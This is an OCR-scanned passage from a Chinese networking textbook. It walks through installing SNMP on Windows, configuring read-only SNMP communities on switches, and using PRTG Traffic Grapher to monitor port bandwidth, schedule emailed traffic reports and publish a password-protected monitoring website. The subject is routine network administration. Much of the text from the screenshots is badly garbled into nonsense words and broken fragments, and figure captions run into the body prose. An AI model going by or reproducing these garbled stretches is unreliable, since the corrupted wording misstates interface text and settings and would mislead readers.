在 安装 使 用 PRTG 软件 之 前 ,应 在 要 安装 PRTG 软件 的 计算 机 上 安装 SNMP( 简 单 网 
络 管理 ) 协 议 。 

在 Windows 控制 面板 中 选择 “添加 或 删除 程序 ”选项 ,然后 选择 “添加 /删除 Windows 
组 件 ” 选 项 ,在 打开 的 “Windows 组 件 向 导 ” 对 话 框 的 组件” 列表 框 中 选择 “管理 和 监视 工 
具 ” 选 项 ,然后 单 击 “ 详 细 信 息 ” 按 钮 .此 时 将 打开 “管理 和 监视 工具 ”对 话 框 ,如 图 7.1 所 示 。 
色 选 “简单 网 络 管理 协议 (SNMP) ”选项 ,然后 单 击 “确定 ”按钮 ,安装 SNMP 协议 。 
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管理 和 鉴 视 工具 B xl 


i 2 RU 1 oas d 


管理 和 监视 工具 MFE: 
O w smr 提供 程序 11m | 
口 BW Windows Installer 提供 程序 0.5 MB 


OOTRARS 0.2 MB 
OS 连接 管理 器 管理 工具 包 1.2 WB 
口 电网 络 监视 工具 | 


描述 : 包含 代 理 程序 可 以 监视 网 络 设备 的 活动 并 且 向 网 络 控制 台 工 作 站 汇报 - 


famasia: 41B FARRU 
Tamasa: 1799.6 加 


— * | 
图 7.1 安装 SNMP 协议 


2. 配置 网 络 设备 SNMP 团体 名 

要 使 PRTG 能 通过 SNMP 协议 获得 网 络 设 备 的 流量 数据 ,网 络 设备 必须 配置 SNMP 
团体 名 ,并 设置 对 MIB 对 象 拥有 读 取 权限 。SNMP 协议 使 用 UDP 协议 通信 ,SNMP 代理 
服务 使 用 UDP 161 号 端口 提供 服务 ,SNMP 管理 端 使 用 UDP 162 号 端口 。 

对 于 Cisco 或 锐 捷 的 网 络 设 备 , 可 在 配置 模式 下 执行 “snmp-server community public 
RO” MG ,配置 网 络 设备 的 团体 名 为 public. X} MIB 对 象 拥有 ROCRead Only) 权 限 。 

对 于 华为 或 华 三 的 网 络 设备 ,可 通过 执行 snmp-agent community read public 命令 来 实现 。 

3. 安装 PRTG 

下 载 解压 后 ,运行 安装 程序 ,使 用 默认 设置 项 安装 ,如 图 7.2 所 示 。 


@ Setup - PRTG Traffic Grapher (Commercial Edition) 


= 151 xl 
Select Additional Tasks 
Which additional tasks should be performed? 


Select the additional tasks you would ike Setup to perform whie instaling PRTG Traffic 
Grapher (Commercial Edition), then cick Next. 


Windows Firewall Setup: 
| 

C. Disable network access (web interface only accessible on the local PC) 
PRTG Watchdog Installation: 

G Instal the PRTG Watchdog service (recommended) 

C Donat install the PRTG Watchdog service 


—e= Fa ee | 


图 7.2 选择 要 安装 的 组 件 


4. 注册 PRTG 
软件 安装 成 功 后 ,首次 启动 PR TG .将 显示 如 图 7. 3 所 示 的 注册 向 导 。 
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Welcome to PRTG Traffic Grapher. This easy-to-use bandwidth and asset monitoring application 
for computer networks is available in three editions, please choose the one that best fits your needs! 


This edition may be used for free for personal or commercial use Itis imiied to monitoring 
only up to three devices/sensors and wil always show this dialog upon startup. 
Run A Free Trial Of The Commercial Edition 


Do youneod moro marici pone han he hoowere Edin providos? Tho Tri E Bon dies 
you unlimited use days so you can test whether one of the commercial ediions is 
aiou More Benene ol e Commercial Eaton 


30Daysleft | ] 


Purchase or Register a Commercial Edition 


时 Choose this option to either buy a license now [starting at $99.95) or to enter your icense key that 
EJPAESSLER you have received upon your purchase [which will also hide this screen for the future] 


图 7.3 软件 注册 向 导 


选中 Purchase or Register a Commercial Edition 单 选 按钮 ,然后 单 击 Next 按钮 ,此 时 
将 显示 如 图 7.4 所 示 的 对 话 框 ,要 求 输入 注册 的 用 户 名 和 Key, 输 入 完毕 后 , 单 击 Next 按 
钮 ,完成 产品 的 注册 。 注 册 成 功 后 的 主 界面 如 图 7.5 所 示 。 


Welcome to PRTG Traffic Grapher 


1. Purchase a License Key 
your license from the Paessler Online Store! Visit 
at Wa; Jf you pay with your credit card you wil usually 


receive your key by email within a few minutes. but we also offer various other payment 
options. Please note that we back our products with a 30 Day Money Back Guarantee 


2. Enter your License Key 
After you have received your license key, please enter t below and cick on Next. 


License Key 


回 PAESSLER 


图 7.4 输入 产品 的 注册 用 户 名 和 Key 


5. 配置 使 用 PRTG 

(1) 添加 监控 设备 

通过 添加 Sensor 来 增加 被 监控 的 网 络 设备 。 在 如 图 7. 5 所 示 的 主 界面 中 , 单 击 Click 
here to add your first sensor 按钮 , 即 可 添加 第 一 个 Sensor。 单 击 后 将 打开 添加 Sensor 向 
导 , 如 图 7.6 所 示 。 

在 如 图 7.6 所 示 的 对 话 框 中 ,直接 单 击 Next 按钮 ,此 时 将 显示 如 图 7. 7 所 示 的 对 话 框 ， 
要 求 选择 采集 镜像 数据 的 实现 方式 。 选 择 默 认 的 SNMP (Simple Network Management 
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pher - default.prtg 


How to get started. 
Welcome to PRTG 
This software makes it easy to 


monitor bandwidth and network 
usage. 


Steps to get started: 


Viewing the web interface 
PO 
BE prTG rrarric Grapher Please refer to the manual for further 
: instructions! 


CP Ckck here to add your first sensor 
Freeware vs. Full Editions 


You may use the Freeware Edition 


is limited to monitoring only up to 
three sensors at a time. |f you want 
to monitor more sensors please 
consider; 


starting at $39 35/73 95 


图 7.5 PRTG 主 界面 


Add Sensor Wizard 


Welcome to the Add Sensor Wizard 


This wizard will guide you step-by-step through the setup of new sensors for monitoring 
wèh PRTG Traffic Grapher. 
Creating new sensors involves three main steps: 


1. Selecting the data acquisition technology (SNMP. packet sniffing or NetFlow) 
2 Selecting the device/server and scanning i for available sensors 
3 Selecting the new sensors and choosing a group as well as an interval 


Note: If you want PRTG Traffic Grapher to scan your network automatically for SNMP 


enabled devices please use the Automatic Network Discovery to create SNMP based 
sensors. 


Please click "Next" to continuel 


EJPAESSLER 


图 7.6 添加 Sensor 向 导 


Protocol) 选 项 ,然后 单 击 Next 按钮 ,此 时 将 显示 如 图 7.8 所 示 的 对 话 框 。 

如 图 7. 8 所 示 的 对 话 框 用 于 选择 Sensor 的 类 型 。 此 处 是 流量 监控 ,因此 ,选择 
“Standard Traffic Sensor” 类 型 的 传感器 ,然后 单 击 Next 按钮 .此 时 将 打开 如 图 7. 9 所 示 的 
对 话 框 , 要 求 设置 被 监控 的 设备 的 IP 地 址 SNMP 团体 名 称 和 SNMP 端口 号 等 配置 信息 。 

设备 名 称 用 于 标识 该 设备 ,可 任意 命名 。IP 地 址 设置 为 该 设备 上 的 某 一 个 端口 的 地 址 
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Add Sensor Wizard | 


Data Acquisition Type 
Please select the desired technology to gather monitoring data 


€ SNMP (Simple Network Management Protocol) 
Recommended for most standard situations. (Lean More...) 
es ee ANE AEA rvs ne hee roms EE em a OREA 
switches pott-by-port. Also offers monitoring device readings ike dsk space, free memory, CPU 
Paar e a EN A depth monitoring of Windows Systems using 
SNMP Helper: Monitors any DID value that is accessible by SNMP. Cons: Monitored devices must support SNMP: 
Does not support differentiation of tralfic by service/protocol 


C Packet Sniffing 


Recommended if differentation of traffic by service/protocol is required. Leam More...) 

With this option PRTG can inspect all network data packets passing the local machine's network card. Thie way you 
Pen er ponder is motin toffo a sour nelait’ alf fiy oomecirgi ta tha “morioirg’ pot of a sech} 
Cons: Creates the highest CPU load on the machine running PR 


C Netflow Collector 


Recommended for high traffic networks with NetFlow capable devices. [Leam More. 
CD PA E EA E EAA 
ee A ECAI EE EA A NAA your Cisco routerfs). 


C Latency Monitoring 
Monitors data packet latencies in your network using ICMP pings. Wil help you to find overloaded network segments or 
latency readings. 


a esla ra ee the! 


图 7.7 选择 采集 镜像 数据 的 实现 方式 


Cancel 


Add Sensor Wizard xil 


SNMP Sensor Type Selection 
Please select the desired sensor lype 


€ Standard Traffic Sensor 
Choose this option to monitor the bandwidth going in and out of a network device. [Uses MIB4I Standard) 


C SNMP Helper Sensor r] B 


Montor horsens ofon pas en ceantar Simpy dan he SNMP oles or 
| Windows XP/ and choose this sensor type to monitor values ike "disk writes/s", "DHCP Server 
Regussts/s", "Exchange en Re To ner ee and many more. The freeware edition (80 


l 
Exchange, Biztalk and ISA Server. 


C From OID/MIB Library m B 
PRTG inchados a database of commoniy used OID: and you can import MIBs to create your own OID Library fies [see 
manual). Please choose an item from the fst of OID Libre 

C Custom SNMP Sensor 
With this option you can enter custom OIDs to monitor almost any SNMP counter (for advanced users}. 


C Device Template 


Youean sase maa om ei q dees emplie by ning oups q senso lo soksiewissieshtenen, 
window. Afterwards you can choose one of the templates here to create the same set of sensors for another device. 


<Back Next> Cancel 


图 7.8 选择 Sensor 类 型 


或 某 一 个 VLAN 接口 的 地 址 ,以 便 PRTG 能 与 该 设备 进行 正常 通信 。SNMP 版 本 建议 选 
择 默 认 的 V1,SNMP Port 使 用 默认 的 161,SNMP 团体 名 设置 为 被 监控 设备 上 所 设置 的 团 
体 名 称 ,通常 设置 为 "public”, 设 置 好 后 , 单 击 Next 按钮 . 接 下 来 PRTG 将 扫描 该 设备 ,扫描 
成 功 后 ,将 显示 如 图 7. 10 所 示 的 对 话 框 .要求 选择 要 进行 流量 监控 的 端口 。 

有 一 个 要 监控 的 端口 就 要 创建 一 个 Sensor: 因 此 ,在 此 处 Sensor 和 端口 是 一 一 对 应 的 
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ra 


Device Selection 
Please enter the device connection data 


Device Name/Alas: 

IP Address/DNS Name: [ 

SNMP Version: 人 VT Most commonly used Tiy this one í your are not surel 
CC V2e: Supports 64 bit counters [use this e g for Gigabit inks) 
C V3 Supports authentication and/or enciyption 

SNMP Port 四 习 [Standard is 1617) 

SNMP Community Suing [pubic [Standard is pubic] 


lep 
= "My Router" o "Mal Server) 


图 7.9 设置 被 监控 的 网 络 设备 


Add Senso 


Sensor Selection 


Please select the sensors to create 


#134218113 [GigabitE themet2/1/49). Gigabit Ethernet. Connected. 1000000 kb/s, 32bit Count: 
#201326601 [GigabaE hemet3/1/1] Gigabit Ethemet Connected 1000000 kb/s. 32bit Counter Al | 


o 

š 

E #201326617 (GigabitE themet3/1/3), Gigabit Ethernet, Connected, 1000000 kb/s, 32bit Counter None 

š #201326625 (GigabitE themet3/1 74), Gigabit Ethemet, Connected. 1000000 kb/s, 32bit Counter — Noe | 
z 1 


IT Hide ports wth esting sensors 


Select the value to monitor: [Sasan z] 


Info: 

[Connected to "Huawer3Com Versatile Routing Platform Software 二 | 
|S8505 Product Version S8500VRP310-R1271P01 

ICopynight Ic] 2003-2006 Hangzhou Huawer3Com Tech. Co. Ltd Al nights reserved. 

Compied Apr 4 2006 1814:54, RELEASE SOFTWARE zj 


图 7.10 选择 要 进行 流量 监控 的 端口 


选择 好 要 监控 的 端口 后 , 单 击 Next 按钮 ,此 时 将 显示 如 图 7. 11 所 示 的 对 话 框 ,保持 默认 设 
置 , 单 击 Finish 按钮 ,完成 Sensor 的 添加 和 配置 。 

Sensor 添加 配置 好 后 的 PRTG 主 控 界 面 如 图 7. 12 所 示 。 从 图 7.12 中 可 见 ,PRTG 已 
开始 对 所 配置 端口 进行 流量 监控 了 。 在 左 侧 的 Sensor 列表 中 , 单 击 要 查看 流量 的 端口 ,可 
在 右 侧 的 流量 图 显示 区 域 显 示 出 该 端口 的 当前 和 历史 流量 图 。 

在 如 图 7. 12 所 示 窗 口 右 侧 的 流量 图 形 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 View Details 
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Jisan ns == 


FA > 


Additonal Settings 
Please select the sensor settings @ 


Inset Inlo Sensarist bso Ey -; 
Í Create New Subgroup ss505 


Scanning Interval [s} 30 Z (10 to 60 second recommended) 


Tags (comma seperated): [ ssa | 


图 7.11 对 Sensor 进行 设置 


S osae ia | S, = 
Mow s= = 


30734 hbt/second S8505 (1921€ 
335 hol/second 50505 (192 1€ 


Pot 134217953 [GwebiE heel2/1/29] 42.845 kba/second S8505 (192 1E 


四 Pont 134217969 [GigsbiE emat2/1/30) 96 kb/second S8505 (192 1E 
E Pont 134217977 [GigabE heret2//31] 7 Ko/eecond 58505 [132 1E 
t Port 134217305 GigsbiE hemet2//32) x 4 ktsecand 58505 [132 1E 


Port 201326601 (GigabiE hemel3/1/1) oo 102216 kbt/second 58805 (192 16 
Pot 201326609 (GigsbiE hemel3/1/2) oo 4.135 kbs/second 58505 (192 1E 
Past 201326617 (GigabiE hemat3/1/Jo 291 kè/second S8505 [1921E 
Pon 201326625 (GgabiE themet3/1/4] 0 5.415 kbt/secondS8505 (192 1E 
Pon 201328679 (GpsbiE hemel3/1/5)o 4.148 kbtsecondS8505 [192 1E 
Pot 201326641 (GabiE themel3/1/6) oo 43,056 kba/second S8505 (192 1E 
Pot 201326649 (GigabiE theret3/1/T) oo 53.514 kbt/second S8505 (192 1E 
Pon 201328657 (GabiE ihemel3/1/8) oo 39.360 kot/second S8505 [192 1E 
Pot 201328665 GigabiEhemat3/1/S]o 39.641 kb/second S8505 (192 1E 
oo S 


本 Verson Ë adds i — 
=== 


+h = = += tn 


Er 


SPAESSLER | 
[ Ve 0.5.451 Enteronse Eden. Tass relreche Err 


图 7.12 PRTG 流量 监控 主 界面 


菜单 项 ,可 更 详细 地 显示 流量 图 形 , 如 图 7. 13 所 示 。 

(2) 更 改 Sensor 的 显示 名 称 

在 如 图 7. 12 所 示 界 面 左 侧 的 Sensor 列表 中 ,被 监控 的 端口 Sensor 的 显示 名 称 默认 采 
用 “Port 134217857 (GigabitEthernet2/1/16) on S8505 (192. 168. 252. 254) ”格式 显示 ,这 
种 显示 格式 看 不 出 端口 的 用 途 ,不 利于 管理 员 立 即 看 出 是 哪 由 楼 的 流量 有 异常 。 为 此 ,在 显 
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gabitEthernet2/1/16) (192.168.252.254) 


{raph Bö Minutes | Graph 24 Hours | Graph: 30 Dayz | Graph: 385 Days | Tabie: 24 Hours | Tabie: 30 Days | Table: 365 Day: | 


Live Graph - 60 Minutes - 30 sec Interval 


nn 


1020 1030 > 1050 1100 hao 


图 7.13 显示 详细 的 流量 图 


示 名 称 上 可 增添 端口 用 途 。 

在 Sensor 列表 框 中 要 更 改 显 示 名 称 的 端口 Sensor 上 右 击 ,在 弹出 的 菜单 中 选择 
Rename 菜单 项 ,此 时 将 弹出 * 更 名 ”对 话 框 ,设置 修改 端口 Sensor 的 显示 名 称 , 然 后 单 击 
OK 按钮 , 即 可 完成 对 端口 Sensor 显示 名 称 的 更 改 。 所 有 端口 Sensor 显示 名 称 更 改 后 的 主 
界面 如 图 7. 14 所 示 。 


Graph | Tabi 24 Hous | Tabie 30 Days | Tabte: 365 Days | 


FREE 
| ë | Š = 

[= — 
== 到 


日 9505 
59506IGipabiEihemet2/1 /1 二 合川 扩 区 VPN 27.583 basecond S850 
S8505 themet2/1/13To DNZ. Faewsl 


Soreors SS505GgebtE hem? 1 2949 ENE 
S857Go%bE heme /X0 To sIVPN 188 Hbisscond S950 
E 6505IGiDabiE theme2/1/311To_ 联 通 VPN 46 barecondS950 
= SESO GipabiEthernei2/1/32) Ta PB x48AC h bi/second S650 
= $8505 GabE hemet VIRIERHABE 6731 NtsecandSE50 
SESNGigabiEthemet3/1/2 ES E 44572 ki/second 5850 
一 SEGi hene IRTEE 2225 bi/secandS850 
SESONG igabiE theeta 74) SISTE 3287 Ma/second S850 
B° S9505 [GigabtE themet3/1/5): 7 S94 kba/second S850 


S8506IG iDabiElheme3y1 /到 2 学生 福 含 51.549 hti/secondS850 
SE506GigabiEihemer3 SEEE 37 3950 bisecondSE50 
S6505IGIpabtEtheme3/1/10 避 实 训 和 11258 be/recond S850 z 


TB ET EI 


图 7.14 更 改 Sensor 显示 名 称 
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(3) 增加 或 删除 Sensor 

使 用 工具 栏 中 的 Add 按钮 ,或 快捷 菜单 中 的 Add Sensor 菜单 项 ,可 新 增 Sensor, MA mi 
实现 新 增 要 监控 的 设备 或 端口 。 

使 用 工具 栏 中 的 Delete 按钮 ,或 快捷 菜单 中 的 Delete 菜单 项 ,可 将 Sensor 列表 框 中 当 
前 选中 的 Sensor 移 除 ,实现 不 监控 该 端口 的 流量 。 

(4) 对 流量 监控 的 管理 

可 根据 需要 随时 停止 .暂停 或 重新 开启 对 某 端 口 的 流量 监控 。 这 使 用 工具 栏 或 快捷 菜 
单 中 的 Stop、Pause 或 Start 功能 项 来 实现 。 

(5) 调整 Sensor 的 排列 次 序 

要 调整 Sensor 列表 框 中 各 Sensor 的 排列 次 序 ,可 使 用 快捷 菜单 中 的 Move Up 和 
Move Down 菜单 项 来 实现 。 

(6) 编辑 Sensor 

对 每 一 个 被 监控 端口 的 Sensor, 可 对 其 设置 进行 编辑 修改 。 这 可 通过 工具 栏 中 的 Edit 
按钮 或 快捷 菜单 中 的 Edit 菜单 项 来 实现 。 

首先 在 端口 列表 中 选中 要 编辑 的 Sensor, 也 就 是 监控 的 端口 。 然 后 单 击 Edit 按钮 ,此 
时 将 打开 如 图 7. 15 所 示 的 对 话 框 。 


Edit Sensor - 58505 (GigabitEthernet2/1/16) 到 内 网 出 品 xl 
E Identification 
Comments m 
E Sensor Settings Volume: kbyte B 
PE Speed 中 >] per [second 了 
Webserver Access yi 


Notifications & Limits 


SNMP Scale 六 1008 G Divide CN 
i Chan Asis hom o o 0 到 (0 = saomaicl 
I Spike Fiter: 0 到 iper second) 


厂 Support negative values 


图 7.15 编辑 修改 Sensor 设置 


(7) 同时 显示 多 个 流量 图 

在 Sensor 列表 框 中 ,选择 All Sensors ,此 时 将 在 右 侧 同时 显示 出 多 个 Sensor 的 流量 
图 ,如 图 7. 16 所 示 。 

从 图 7. 16 可 见 ,默认 情况 下 按 4X4 的 布局 格式 显示 , 即 一 次 显示 16 个 Sensor 的 流量 
图 。 若 要 同时 显示 出 更 多 的 流量 图 ,可 通过 修改 PRTG 的 Windows GUI 设置 来 实现 。 

在 PRTG 的 Extras 主 菜单 下 面 选择 Options 子 菜单 项 ,可 打开 Options 设置 对 话 框 ， 
如 图 7.17 所 示 。 

若 将 Rows 的 值 由 4 调整 到 5,Columns 值 保持 不 变 , 则 最 多 可 同时 显示 20 个 Sensor 
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@ PRTG Traffic Grapher - default prtg 


图 7.16 同时 显示 多 个 流量 图 


PRTG Traffic Grapher PAESSLER 


[Visible Charts for Single and Multiple 6nphs 一 一 一 一 一 
F Live Data [60 minutes 

F Custom Averages 

F 1 Hour Averages 

T 1 Day Averages 


[ Advanced Windows GUI Settings =  ăãž 一 
Max. Number of Graphs on Screen |4 A| Columns |4 z Rows 
Decimal Digits in Tables: 3 z 


图 7.17 设置 PRTG 多 图 显示 的 数量 


的 流量 图 ,如 图 7.18 所 示 。 

(8) 查看 Sensor 流量 汇总 信息 

在 PRTG 主 控 界面 最 左 侧 的 工具 栏 中 , 单 击 Sensors 图 标 ,可 实现 在 主 控 界面 右 侧 区 域 
仅 显 示 Sensor 的 相关 信息 ,其 中 包含 Sensor 的 IN 和 OUT 两 个 方向 的 流量 总 和 (Sum) 信 
息 , 如 图 7.19 所 示 。 

(9) 生成 和 查看 流量 报告 

在 PRTG 主 控 界面 最 左 侧 的 工具 栏 中 . 单 击 Reports 图 标 ,可 生成 和 查看 流量 报告 ,此 
时 主 控 界面 如 图 7.20 所 示 。 
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Jisan ns == 


@ PRTG Traffic Grapher - default prtg 


E SBS0S(Gigabit Ethernet? Q E 


PRTG Fieiro Montor Sha: been iaai 
Vernon 3 adds mary new leahaes 


图 7.18 调整 流量 图 显示 数量 后 的 主 界面 


@ PRTG Traffic Grapher - default.prtg lolx) 
Ele Edt view Tags Extras Hep New Version avalablel 


Views Sensi 


S8505/GigabtE themet2/1/11 BE JIEVPN 50.350 kbh/second $8505 (192 168 252 254) 30 sec 
58505 (GigabitEthemet2/1/13)To_DMZ_Frewal 1,364 kbit/second S8505 (192.168.252.254) 30 sec Traffic 

58505 (GigabitE themet2/1 160A AHO 449,093 kbit/second S8505 (192.168.252.254) 30 sec Traffic 
58505(GigabàEthernet2/1/20UF FETE 54.256 kbi/second S8505 (192 168 252 254) 30 sec Traffic 

e3 58505IGigabtEthemet2/1/30) To_ 电 信 VPN 261 kbit/second S8505 [192 168 252 254) 30 sec Traffic 


$8505(GigabtE themet2/1/31) To_ 联 通 YPN 18 kbi/second 58505 [192 169 252254) sec Traffic 

Daka SBS05(6igabaEthemet2/1/32] To_ 联 通 无 线 AC 4 kba/second S8505 (192168252254) 30 sec Traffic 
四 S8505 [GabhEthemel3/1/1 画 | 五 桥 铺 校区 6.369 kbi/second S8505 [192 168 252254) 30 sec  Tralfic 
S8505(GigabaEthemet3/1/28J RSE 49.118 kbi/second S8505 [192 168 252 254] 30 sec Traffic 
= S8505(GigabaEthemet3/1/3 Ë T 8 9 kbi/second S8505 [192 168 252254) 30 sec Trafic 
“awa 58505(GigabE thernet3/1/4) BIEFSIE 9 kbit/second S8505 (192.168.252.254) 30 sec Traffic 


$8505 (GigabitE thermet3/1/5 BIRF 2.84 kbi/second S8505 [192 168 252 254) 30 sec Traffic 
S8505 (GigabtEthemet3/1/6) BJISEf8 f 。 — 89534 kbh/second S8505 (192 168 252254) 30 sec Traffic 
S8505 [GgabhEthernel3/1/7 到 5 号 学 生 宿 含 — 140.139 kbi/second S8505 (192 168 252 254) 30 sec 


b, 
include all sensor lypes. No more add-ons! Al editions including the heeware can now monitor NetFlow sensors and unimied remote 


notes (version history] can be found here: http://www paessler com/prta/pdtaBhistor 
IT domricad tne latest vermon sisane go te Mia hem naene en ened 


BPAESSLER 


V6.0.5.451 Enterprise Edition 15622 refreshs 


图 7.19 查看 Sensor 流 量 汇总 信息 


在 如 图 7. 20 所 示 的 界面 中 , 单 击 项 部 工具 栏 中 的 Add 按钮 ,可 添加 流量 报表 计划 任 
务 , 该 任务 可 在 设置 的 时 间 自 动 生成 流量 报表 。 此 时 将 打开 如 图 7. 21 所 示 的 Edit Report 
对 话 框 。 

Report Name 项 设置 报表 的 标题 名 称 , 比如 设置 为 * 内 网 到 因特网 出 口 的 流量 报告 ”。 
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BIB 


四 
m 


i 


ERE 


图 7.20 流量 报表 功能 项 


J| 
Settings | Sensors | Emal& Export | 
Repot Name: [ 
Repowrareet vo ziom. ei ZE] 
[period is ful month) 
Accountedhows: [om z] to [z253 了 (= whole day) 
Detalinevt po A days 了 


Options: F Include Details F Remove Empty Rows 


图 7.21 流量 报表 设置 


Reporting Period 用 于 设置 流量 的 时 间 间 隔 单位 ,默认 为 Month。 在 本 例 中 ,由 于 刚 开 始 进 
行 流量 监控 ,此 处 将 其 改 为 Day, 后 面 的 from 和 to 设置 项 会 自动 更 改 为 00:00h 和 23:59h。 

Accounted hours 默认 为 一 整 天 。Detail interval 用 于 设置 流量 采样 的 更 精细 的 时 间 间 
隔 。 当 时 Reporting Period 设置 为 Month 时 ,该 项 默认 设置 为 1days。 在 本 例 中 ,由 于 前 面 
设置 为 Day, 此 处 可 更 改 为 1hours。 修 改 好 设置 的 界面 如 图 7.22 所 示 。 

选择 Sensors 选项 卡 , 切 换 到 对 Sensor 的 选择 对 话 框 ,在 该 对 话 框 中 可 选择 要 生成 流 
量 报表 的 Sensor, 本 例 选 择 到 内 网 出 口 的 Sensor, 如 图 7. 23 所 示 。 

选择 Email ë. Export 选项 卡 ,切换 到 对 流量 报表 格式 和 导出 目的 地 的 设置 对 话 框 ,如 
图 7.24 所 示 。 

从 图 7. 24 的 设置 项 可 见 ,配置 好 该 报表 生成 模板 后 ,可 在 指定 日 期 的 1 点 钟 自动 生成 
报表 ,并 可 将 报表 自动 发 送 到 指定 的 邮件 地 址 。 

车 要 将 生成 的 报表 发 送 到 指定 的 邮箱 , MJ ZJ ë Send Report via Email 选项 ,并 在 
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I S8505(GigabitE themet2/1/11 画 [合川 校区 VPN 
hemel2/1/13JTo_DMZ_Fiewal 


GENC 


图 7.24 流量 报表 格式 与 导出 设置 


Address 输入 框 中 输入 要 接收 报表 的 邮箱 地 址 。 另 外 ,还 要 注意 PRTG 的 global Options 
功能 项 中 设置 发 件 服务 器 的 地 址 ,其 设置 界面 如 图 7. 25 所 示 。 
目前 ,很 多 邮件 服务 器 在 发 送 邮 件 之 前 ,都 需要 进行 SMTP 发 件 认证 。 需 要 在 SMTP 
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@PAESSLER 


| SMTP Server [used to send reports and notification emails) | 
Server. 


一 一 一 一 一 一 一 一 一 一 
Pott a 3 hEloden [PRTG 


| Email "From" Field 


Emal Address: 
[PRTG Trafic Grapher 


图 7.25 设置 发 件 服务 器 地 址 和 SMTP 认证 信息 


Authentication(Optional) 栏 目 中 设置 自己 邮箱 的 用 户 名 和 密码 ,以 供 发 件 认 证 。 若 邮件 服 
务 器 设置 有 发 件 之 前 须 先 收 信 的 限制 (一 般 邮 件 服务 器 都 无 该 项 限制 ), 则 勾 选 POP3 
before SMTP(optional) 选 项 ,并 填写 POP3 收 件 服务 器 的 地 址 、 邮 箱 用 户 名 和 邮箱 密码 。 
对 于 邮件 服务 器 支持 多 邮件 域 的 邮件 系统 ,邮件 用 户 名 必须 是 完整 的 邮件 地 址 ,而 不 能 仅 填 
邮件 地 址 中 “@” 符 号 左边 的 用 户 名 部 分 。 

若 要 将 生成 的 报表 保存 到 本 地 的 某 个 文件 夹 中 , 则 勾 选 Save Report To File 选项 ,并 
在 Folder 输入 框 中 选择 指定 保存 报表 的 文件 夹 。 在 Format 栏目 中 可 选择 和 设置 报表 的 格 
式 。 设置 好 后 , 单 击 对 话 框 中 的 OK 按钮 ,完成 流量 报表 计划 任务 的 设置 。 设 置 好 后 的 主 界 
面 如 图 7. 26 所 示 。 


[Period [Detal |Sensors |SendEmal |SavetoFie | Schedule 
内 网 因特网 出 口 的 流量 报 省 Day (0000-2359] 1Hou 1 book@eaddcqen PDF every day at 00:00h 


图 7.26 创建 好 的 流量 报表 计划 任务 
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在 如 图 7. 26 所 示 的 界面 中 , 单 击 顶 部 工具 栏 中 的 > 
View 按钮 ,或 者 直接 双击 报表 计划 任务 ,可 预览 流量 报 — Sentosa 
表 。 此 时 将 打开 如 图 7. 27 所 示 的 对 话 框 ,选择 好 要 预览 = 
流量 的 日 期 后 , 单 击 OK 按钮 , 即 可 预览 流量 报表 ,如 | 名 

1 
2 


7 8 s En e 
图 7.28 所 示 B u 15 6 7 18 19 


2 2 2 23 %4 2 % 
利用 预览 窗口 顶部 工具 栏 中 的 工具 按钮 ,可 实现 流 a a a 3 3 1 ; 
量 报表 的 打印 .导出 .导出 成 PDF 文件 。 Zamaa, 
6. 利用 网 页 访问 流量 监控 星期 0912 2010 0000 - 星期 0912 2010 2359 
在 PRTG 主 界面 中 , 单 击 左 侧 工具 栏 中 的 Browser Ta 
按钮 ,可 看 到 网 页 的 访问 效果 。 下 面 以 真实 的 网 页 访问 ， Cancel 


介绍 如 何 通过 网 页 来 监控 网 络 流量 。 

(1) 流量 监控 网 站 设置 

PRTG Wik Y — Web 服务 ,用 于 发 布 流量 监控 。 对 内 艇 的 Web 服务 器 的 相关 设置 ， 
由 PRTG 的 Options 对 话 框 中 的 Web Server 设置 项 来 实现 ,如 图 7. 29 所 示 。 


图 7.27 选择 要 预览 报表 的 日 期 


pnt DOOD -Bls ne: >w Co 


@ 内 网 到 因特网 出 口 的 流量 报告 
PRTG Traffic Grapher Sensor:S8505 (GigabitEthemet2/1/16) 到 内 网 出 品 


2010 年 2 月 0 日 


nm mo mm Ho Sm wm mo mm mm W0 10 120 130 M0 
Sum rn Ta L | 

Bandwidth Traffic RanaWiqtn rati DUT Sum age. 

Tirte fecond] bite bt second| — Kayta Ik 


Foro-z-ro Tano- EE 28: ;w0 7sz 1755523296. s =. a 


0o11 1300- tm e Dio | ieas so resis 7 ya Pa sss 7 WO 
rien 1200 rao 120 278 57 ams =s SS 25 ms] erar tec rg 2125 SE s S +rs 
1 = e S] ss s= |= 222 SÍ 号 这 过 


16 382 170 37 | 386.3 S| 


Bandwidth Traffic IN | Bandwidth Traffic OUT Sum [Coverage | 
Te second] Kove second 


oye 
[reai valme | 1.522 005 551 EEEN [ren 
[verae [Sara sea aae EL EL 四 


Fii [ 


图 7.28 预览 生成 的 流量 报表 


从 图 7. 29 中 可 见 ,网 站 默认 使 用 的 端口 为 TCP 8080。 对 于 网 站 的 访问 ,默认 情况 下 ， 
人 允许 所 有 用 户 访 问 。 若 要 设置 访问 限制 , 则 选中 Limited Access; Access is only allowed 
for users defined on the "Users" page 单 选 按钮 ,然后 在 Users 设置 对 话 框 中 ,设置 允许 访 
问 的 用 户 名 及 对 应 的 密码 ,如 图 7. 30 所 示 。 单 击 Edit 按钮 ,可 设置 和 修改 账户 的 密码 。 

设置 网 站 受 限 访问 和 人 允许 访问 的 用 户 名 和 密码 后 ,使 用 http://192. 168. 168. 15:8080 
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EPPAESSLIER 
[和 Enable Internal Webserver 
LocallP: 19216816815 了 
Pot: 


[0 PQ [Port 80 is vecommended. otherwise uy port 8080 and up) 
I Write webserver access logfile 


| Website Access Control 


他 UnimiledAccess The web interface is not protected [use with caution!) 


C Limted Access Access is only alowed for users defined on the "Users" page- 
T Hide custom, group tags and tag favorites in webserver 


图 7.29 流量 发 布 网 站 设置 


Options 
@ PRTG Traffic Grapher 


User Interface 


EBPAESSLER 


| User Accounts for Web Interface Access 一 一 
Users Comments: 

[This is the default admin user. Change = 
[the default password [admin] using the 
"Edt" button before enabling pubic 
am g 
This user is a member of: 
Administators 


w |== 0 


Groups can be added on the "Groups" page! 


图 7.30 设置 允许 访问 流量 监控 网 站 的 用 户 账 户 


地 址 访问 网 站 时 ,就 必须 先 登录 验证 用 户 身份 , 校 验 通 过 后 ,才能 访问 到 流量 监控 的 主页 面 。 
登录 页 面 如 图 7.31 所 示 , 登 录 成 功 后 , 即 可 进入 流量 监控 主页 面 ,如 图 7. 32 所 示 。 
若 网 站 访问 不 设 限 , 则 直接 进入 流量 监控 主页 面 。 对 网 站 标题 ,管理 员 邮 箱 , 流 量 图 大 


小 的 设置 ,可 在 Website 设置 项 中 进行 ,如 图 7. 33 所 示 。 
(2) 流量 图 的 查看 


